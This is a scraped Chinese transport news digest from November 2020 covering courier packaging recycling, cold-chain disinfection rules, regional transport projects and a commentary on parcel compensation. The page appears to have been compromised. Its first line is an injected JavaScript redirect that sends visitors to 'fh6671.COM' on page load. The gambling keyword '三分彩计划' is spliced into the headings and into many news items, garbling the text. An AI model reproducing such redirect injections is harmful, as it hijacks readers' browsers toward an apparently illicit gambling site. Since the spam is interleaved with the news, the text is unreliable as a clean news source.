function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 舆情

每日动态20201117丨国家邮政局:99%塑料类快递包装无法有效回收利用

2020-11-17 09:38:46 来源: 作者:徐月灵

三分彩计划◆◆行业要闻 

→交通运输部近日印发《公路、水路进口冷链食品物流新冠病毒防控和消毒技术指南》,明确进口冷链食品装卸运输过程防控要求和消毒要求,要求装卸作业人员应避免频繁接触货物表面,运输人员全程不可直接接触冷链食品。

三分彩计划→国家邮政局近日数据显示,目前中国纸质类快递包装材料有80%能够被回收利用,而塑料类快递包装废弃物由于回收价值低,99%都得不到有效利用。

◆◆各地速报

三分彩计划→近日,交通运输部批复四川省交通强国建设试点实施方案,四川将开展6个方面的试点,包括成渝地区双城经济圈交通一体化发展;高原山区公路建设创新;推动公园城市交通绿色发展;提升交通防灾减灾体系韧性等内容。

→近日,重庆轨道交通延长线跳磴至江津线机电设备工程开建,全线新建6座高架车站,建成后,江津区居民30分钟可抵达重庆中心城区。

→近日,浙江省宣布将全面启动高速公路匝道限速测速工作。作为试点,G15沈海高速公路嘉兴港区收费站11月14日率先启动该项限速测速工作。

三分彩计划→上海市发展改革委近日发布《重点用能单位2019年度节能目标责任评价考核》。其中,吉祥航空被列入未完成等级,市交通委责令其实施能源审计。

→近日,全国北上广深杭等城市的多个小区尝试“快递箱换零食”。快递箱成为这些小区里的“货币”,居民凭快递箱可根据兑换规则免费换零食。

→据宁夏回族自治区纪委监委11月16日消息,宁夏公路建设管理局党委副书记、局长郝方伟涉嫌严重违纪违法,主动投案,目前正接受自治区纪委监委纪律审查和监察调查。

◆◆境外纵览

→日本国土交通省11月11日批准了本田的“Traffic Jam Pilot”系统,该系统能够帮助汽车在拥堵的高速公路上实现自动驾驶,本田也成为全球首家获得国家3级自动驾驶技术认证的汽车制造商。

→韩国政府11月16日召开部门长官会议,商定由韩亚航空的主要债权银行——韩国产业银行投入8000亿韩元支持大韩航空收购韩亚航空。

◆◆舆 说

快递损毁丢失,是双11常见的后遗症。对于快递业来说,与其等着消费者打官司,不如早点完善灭失邮件的理赔机制;法律法规也应该及时跟上,把赔偿责任规定得再具体一些。快递公司的赔偿条款到底在怎样的条件下才具备约束力,保价服务的价格和告知流程必须依据哪项法规,都必须有清晰的界定。有法可依,是对消费者和快递公司双方权益的共同保护,既让消费者在快递贵重物品时提高风险意识,在遇到邮件损坏丢失时可以得到合理的赔偿方案;也倒逼快递公司在承运时提高防范意识,一旦客户邮件损坏丢失,不再推诿责任。

——北京晚报就快递理赔问题发表评论文章《快递理赔别再兜圈子》

image.png


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。